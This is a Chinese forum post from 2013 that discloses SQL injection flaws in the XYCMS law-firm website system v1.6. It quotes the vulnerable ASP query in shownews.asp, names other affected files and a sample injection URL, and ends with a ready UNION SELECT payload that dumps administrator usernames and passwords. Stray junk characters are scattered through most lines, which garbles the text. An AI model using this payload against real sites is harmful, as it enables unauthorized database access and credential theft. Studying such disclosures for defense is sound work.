前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
4 @. L+ c0 C! f) a
$ E$ z; J6 `6 F- m* N. Q淫荡分割线
# p( S6 l8 i0 P/ W' W D. f8 r--------------------------------------------------------1 X+ j% [6 P" u4 b
% ~( p- f' b g审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
9 [9 J! U, s6 @源码地址:http://down.chinaz.com/soft/29233.htm. u, B8 b' c/ Q) P2 h8 _4 y9 e. x" I
% W( m0 D$ e f3 C9 i漏洞文件:shownews.asp
X' V2 M$ i3 c& a7 o4 X" D" ?/ e) S# _漏洞代码:7-13行
9 Y' O$ N) D l( B; ^ 9 R* U8 _: s h7 [) M% o
. O+ A+ `% u1 z: t3 M1 E3 Q; P( \% c<%
4 D- K0 [# \. f+ d9 Z1 g+ L8 ?id=request.QueryString("id")3 E6 W7 ~; h8 T6 p4 ?: H
; `% f( j% \* l5 h; n; k# T+ J
set snews=server.createobject("adodb.recordset") 9 X$ B1 n* Y1 d( |8 `3 Z: U
exec="select * from [news] where id="&id
! j- _3 c ? R8 Vsnews.open exec,conn,1,11 G8 f! e6 F, w) c
%>
9 T4 R6 ? @5 J& L! t7 O ; ]. }/ |. X0 F
- S" i: j# J( i什么过滤都没有 直造成注入
, Z# j2 V3 t) x- J
4 B O- d# u' c5 ?/ P# L注入点:http://127.0.0.1:99/shownews.asp?id=xx4 B" x9 h: K9 n. i6 x& C# G+ x
$ Z* m7 V$ D8 H其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找7 d8 F6 M" Y( e R
! `# s: @- _# @4 s* d' i
' D, _3 \8 M- o, r' {) z' y
exp: union select 1,admin,password,4,5,7 from admin_user& H0 Q( B2 e( J6 [+ U, |# S
0 g3 a0 [. v i2 B" E
|
发表于 2013-4-4 17:28:12
收藏
支持
反对